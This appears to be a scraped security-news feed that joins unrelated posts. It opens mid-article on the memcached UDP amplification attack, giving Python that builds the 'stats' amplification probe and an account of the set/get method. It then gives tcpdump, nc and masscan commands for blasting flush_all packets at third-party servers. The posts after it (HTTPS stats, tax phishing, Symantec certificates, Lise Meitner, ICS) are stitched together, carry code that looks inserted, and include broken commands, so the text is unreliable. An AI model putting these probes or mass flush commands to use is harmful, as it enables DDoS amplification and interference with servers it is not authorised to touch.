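probe = udp_frame(0, b"stats\r\n")
print(len(probe))  # 15
print(probe)       # b'\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n'
```

Sending those 15 bytes to an exposed server's UDP port 11211 is all it takes to trigger the multi-kilobyte reply.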

A harder, but more effective, attack uses a two-step process. You first use the "add" or "set" commands to put chunks of data into the server, then send a "get" command to retrieve them. You can easily put 100 megabytes of data into the server this way, and cause it all to be retrieved with a single "get" command.

That's why this has been the largest amplification attack ever: a single 100-byte packet can in theory cause a 100-megabyte response.

Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet comes to an average of roughly 100 megabits/second per server. This is fairly minor traffic, and is indeed something even small servers (like Raspberry Pis) can generate.
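The arithmetic behind both claims is simple enough to show in a few lines:

```python
# Spread the reported 1.3 Tbps attack across the ~15,000 servers found.
attack_bps = 1.3e12                  # 1.3 terabits/second
servers = 15_000
per_server_mbps = attack_bps / servers / 1e6
print(round(per_server_mbps, 1))     # 86.7 -> "roughly 100 Mbps" per server

# Theoretical amplification factor of the set/get attack:
amplification = 100e6 / 100          # ~100 MB response per 100-byte request
print(int(amplification))            # 1000000
```

A million-fold theoretical amplification factor is why memcached dwarfs earlier reflection vectors like DNS or NTP.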

Neutering the attack ("kill switch")

If they are using the more powerful attack against you, you can neuter it: you can send a "flush_all" command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.

I'm going to describe how I would do this.

First, get a list of attackers, meaning, the amplifiers that are flooding you. The way to do this is grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.

tcpdump -i -w attackers.pcap src port 11211

Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):

tshark -r attackers.pcap -T fields -e ip.src | sort | uniq > amplifiers.txt

Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read the payload directly from a packet capture file. To do this, first craft a packet, such as with the following command-line foo:

echo -en "\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n" | nc -q1 -u 11211

Capture this packet using tcpdump or something, and save into a file "flush_all.pcap". If you want to skip this step, I've already done this for you, go grab the file from GitHub:
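Alternatively, the same flush_all frame can be built directly in Python: it is the standard 8-byte memcached UDP frame header followed by the ASCII command. In this sketch the `send_flush` helper is hypothetical (you would loop it over your amplifiers list rather than use masscan's --pcap-payload):

```python
import socket

# 8-byte memcached UDP frame header (request id 0, seq 0, 1 datagram,
# reserved 0) followed by the command -- identical to the echo/nc bytes.
FLUSH = b"\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n"

def send_flush(host: str, port: int = 11211) -> None:
    """Send a single flush_all frame to one amplifier (hypothetical helper)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(FLUSH, (host, port))
    s.close()

print(len(FLUSH))  # 19
```

Each server that receives this frame drops its cached items, neutering the large set/get amplification described above.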

Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:

masscan -iL amplifiers.txt -pU:11211 --pcap-payload flush_all.pcap

Reportedly, "shutdown" may also work to completely shut down the amplifiers. I'll leave that as an exercise for the reader, since of course you'd be adversely affecting the servers.

Some notes

Here is some good reading on this attack:

Once Upon A Time In Shaolin – Enterprise Security Weekly #82

This week, Paul and John are accompanied by Eyal Neemany, Senior Cyber Security Researcher at Javelin Networks! In the news, we have updates from Duo Security, SolarWinds, AlgoSec, Martin Shkreli, and more on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

How secure are news sites? A report from the first year of Secure The News

Header from the Secure The News project

For over a year now, Secure The News has automatically monitored the HTTPS encryption practices at more than 100 major news sites around the world. Secure The News is a Freedom of the Press Foundation project built to regularly update a scorecard of some 131 news sites. We encourage sites to climb up those rankings because well-configured HTTPS encryption can protect reader privacy, enhance site security, and make important reporting harder to censor or manipulate.

We're pleased to report that since we began monitoring in late 2016, HTTPS encryption has seen a pronounced increase in the quality and reach of its deployment among news sites, and we continue to improve the tools we use to monitor that rise.

Let's start with the stats. We can see the overall rise in HTTPS deployment and quality by monitoring the "grades" we give sites based on their use of HTTPS. Each dot on this graph represents the grade from a sampled scan, while the line shows the average grade over time. That grade, out of 100, has risen from about 31 points at the end of 2016 to over 53 points now. A major improvement, to be sure, but with plenty of room to get better.

Chart showing average and a sample of grades from Secure The News scans

In several key categories, we've compared our very first evaluation of the 131 news sites we monitor with the most recent.

  • HTTPS encryption is available on two-thirds of sites we're monitoring—89 of 131. That's up from just over one-third, or 48 sites, when we first ran tests starting in late November 2016.

  • Nearly 60% now offer HTTPS encryption by default. That's up from just 22% on our first scans—a massive leap in under 18 months.

  • Another exciting development for the nerds: the use of HSTS (HTTP strict transport security), which aims to keep browsers from ever using an insecure connection, is way up: From just 9% of sites in our first scans to up over 25% now.
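The stats above can be recomputed from the scan data. As a toy sketch only — the field names and point weights below are hypothetical, not Secure The News's actual rubric — a grade might combine the three criteria tracked in this post:

```python
def https_grade(site: dict) -> int:
    """Toy HTTPS score out of 100. Weights are illustrative only."""
    score = 0
    if site.get("valid_https"):    # HTTPS available at all
        score += 40
    if site.get("default_https"):  # HTTP redirects to HTTPS
        score += 35
    if site.get("hsts"):           # Strict-Transport-Security header set
        score += 25
    return score

# Three hypothetical scan results: fully secured, HTTPS-optional, plain HTTP.
sites = [
    {"valid_https": True,  "default_https": True,  "hsts": True},
    {"valid_https": True,  "default_https": False, "hsts": False},
    {"valid_https": False, "default_https": False, "hsts": False},
]
avg = sum(https_grade(s) for s in sites) / len(sites)
print(round(avg, 1))  # 46.7
```

Averaging grades like this over each day's scans is what produces the trend line described above.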

In our first year of running Secure The News, we've made a few key improvements to the site as well.

In early 2017 we created a Twitter bot that would post changes to the scorecard each weekday. Now whenever a site turns on HTTPS—or improves their HTTPS security, which readers might not otherwise spot—we post a tweet detailing the change.

We also released the code powering Secure The News as a free software project in February 2017. It is licensed under the GNU AGPL software license, which means improvements made by other people using the software can be folded back into our code.

Finally, we added an API for accessing current and historical scan data. That API was used to collect the statistics in this post and currently powers the Twitter bot. We’ll provide more information about the API, and about other new developments to Secure the News, in the near future.

Strong, well-configured HTTPS encryption is a must-have for news sites operating on the modern Web, and it’s heartening that the first year of Secure The News has recorded so many improvements on that front. Press freedom must include the ability to read free from surveillance, censorship, or manipulation, and we’ll continue to push news sites to take the important technical steps necessary to achieve that goal.

Tax Phishing Scams Are Back: Here Are 3 to Watch Out For

This Year’s Crop of Tax Phishing Scams Targets Individuals, Employers, and Tax Preparers. Tax season is stressful enough without having to worry about becoming the victim of a cyber crime. Here are three different tax phishing scams currently making the rounds, targeting employers, individuals, and even tax preparers. Employers: W-2 Phishing Emails…


Distrust of the Symantec PKI: Immediate action needed by site operators

We previously announced plans to deprecate Chrome’s trust in the Symantec certificate authority (including Symantec-owned brands like Thawte, VeriSign, Equifax, GeoTrust, and RapidSSL). This post outlines how site operators can determine if they’re affected by this deprecation, and if so, what needs to be done and by when. Failure to replace these certificates will result in site breakage in upcoming versions of major browsers, including Chrome.

Chrome 66

If your site is using an SSL/TLS certificate from Symantec that was issued before June 1, 2016, it will stop functioning in Chrome 66, which could already be impacting your users.
If you are uncertain about whether your site is using such a certificate, you can preview these changes in Chrome Canary to see if your site is affected. If connecting to your site displays a certificate error or a warning in DevTools as shown below, you’ll need to replace your certificate. You can get a new certificate from any trusted CA, including Digicert, which recently acquired Symantec’s CA business.
An example of a certificate error that Chrome 66 users might see if you are using a Legacy Symantec SSL/TLS certificate that was issued before June 1, 2016. 

The DevTools message you will see if you need to replace your certificate before Chrome 66.
Chrome 66 has already been released to the Canary and Dev channels, meaning affected sites are already impacting users of these Chrome channels. If affected sites do not replace their certificates by March 15, 2018, Chrome Beta users will begin experiencing the failures as well. You are strongly encouraged to replace your certificate as soon as possible if your site is currently showing an error in Chrome Canary.
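Besides previewing in Canary, you can check the June 1, 2016 cutoff against your certificate's notBefore date directly. A small sketch using Python's stdlib ssl module (note this only checks the issuance date — it does not determine whether the issuer actually chains to the legacy Symantec PKI, so treat a True result as a prompt to investigate, not a verdict):

```python
import ssl

# Chrome 66 distrusts legacy Symantec certificates issued before this date.
CUTOFF = ssl.cert_time_to_seconds("Jun 1 00:00:00 2016 GMT")

def issued_before_cutoff(not_before: str) -> bool:
    """not_before: the certificate's notBefore field in OpenSSL's textual
    form, e.g. 'May 30 00:00:00 2016 GMT' (as returned by getpeercert())."""
    return ssl.cert_time_to_seconds(not_before) < CUTOFF

print(issued_before_cutoff("May 30 00:00:00 2016 GMT"))  # True  -> replace it
print(issued_before_cutoff("Aug 1 00:00:00 2017 GMT"))   # False
```

To check a live site, you could feed this the "notBefore" entry from ssl.SSLSocket.getpeercert() after connecting with a default SSLContext.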

Chrome 70

Starting in Chrome 70, all remaining Symantec SSL/TLS certificates will stop working, resulting in a certificate error like the one shown above. To check if your certificate will be affected, visit your site in Chrome today and open up DevTools. You’ll see a message in the console telling you if you need to replace your certificate.

The DevTools message you will see if you need to replace your certificate before Chrome 70.
If you see this message in DevTools, you’ll want to replace your certificate as soon as possible. If the certificates are not replaced, users will begin seeing certificate errors on your site as early as July 20, 2018. The first Chrome 70 Beta release will be around September 13, 2018.

Expected Chrome Release Timeline

The table below shows the First Canary, First Beta and Stable Release for Chrome 66 and 70. The first impact from a given release will coincide with the First Canary, reaching a steadily widening audience as the release hits Beta and then ultimately Stable. Site operators are strongly encouraged to make the necessary changes to their sites before the First Canary release for Chrome 66 and 70, and no later than the corresponding Beta release dates.
             First Canary        First Beta              Stable Release
Chrome 66    January 20, 2018    ~ March 15, 2018        ~ April 17, 2018
Chrome 70    ~ July 20, 2018     ~ September 13, 2018    ~ October 16, 2018

For information about the release timeline for a particular version of Chrome, you can also refer to the Chromium Development Calendar which will be updated should release schedules change.

In order to address the needs of certain enterprise users, Chrome will also implement an Enterprise Policy that allows disabling the Legacy Symantec PKI distrust starting with Chrome 66. As of January 1, 2019, this policy will no longer be available and the Legacy Symantec PKI will be distrusted for all users.
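For enterprise administrators, that opt-out takes the form of a managed Chrome policy. As an illustrative sketch only — the policy name below is our best understanding of the one Chrome shipped for this, and the Linux path is one of Chrome's standard managed-policy locations, so verify both against the official Chrome Enterprise policy list before deploying — a policy file (e.g. under /etc/opt/chrome/policies/managed/ on Linux) would look like:

```json
{
  "EnableSymantecLegacyInfrastructure": true
}
```

Remember that per the announcement above, this escape hatch disappears on January 1, 2019, so it buys migration time rather than a permanent exemption.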

Special Mention: Chrome 65

As noted in the previous announcement, SSL/TLS certificates from the Legacy Symantec PKI issued after December 1, 2017 are no longer trusted. This should not affect most site operators, as it requires entering into a special agreement with DigiCert to obtain such certificates. Accessing a site serving such a certificate will fail and the request will be blocked as of Chrome 65. To avoid such errors, ensure that such certificates are only served to legacy devices and not to browsers such as Chrome.


Scientific American has a nice write-up of the theoretical physicist who discovered nuclear fission and was denied credit, yet assigned blame:

While the celebrity Meitner deserved was blatantly denied her, an undeserved association with the atomic bomb was bestowed. Meitner was outright opposed to nuclear weapons: “I will have nothing to do with a bomb!” Indeed, she was the only prominent Allied physicist to refuse an invitation to work on its construction at Los Alamos.

  • 1878 born in Vienna, Austria, third of eight children in middle-class family
  • 1892 at age 14, formal schooling ends, as was standard for girls in 19th-century Austria. begins private lessons
  • 1905 earns PhD in physics from University of Vienna
  • 1907 moves to Berlin to access modern lab for research. denied her own lab because a woman, given an office in a basement closet, forced to use bathroom in a restaurant “down the street”
  • 1908 publishes three papers
  • 1909 publishes six papers
  • 1917 given salary and independent physics position
  • 1926 first woman in Germany to be made full professor
  • 1934 intrigued by Fermi work, begins research into nuclear reaction of uranium
  • 1938 Nazi regime forces her to leave Germany, because Jewish
  • 1944 Nobel prize awarded to the Berlin man who ran the lab she used for experiments

Amazing to see how determined she was and how she blazed a trail for others to do good. And yet the things she did, men wouldn’t give her credit for, while the thing she opposed was blamed on her instead.

Insecure by design: What you need to know about defending critical infrastructure

Patching security vulnerabilities in industrial control systems (ICS) is useless in most cases and actively harmful in others, ICS security expert and former NSA analyst Robert M. Lee of Dragos told the US Senate in written testimony last Thursday. The "patch, patch, patch" mantra has become a blind tenet of faith in the IT security realm, but has little application to industrial control systems, where legacy equipment is often insecure by design.
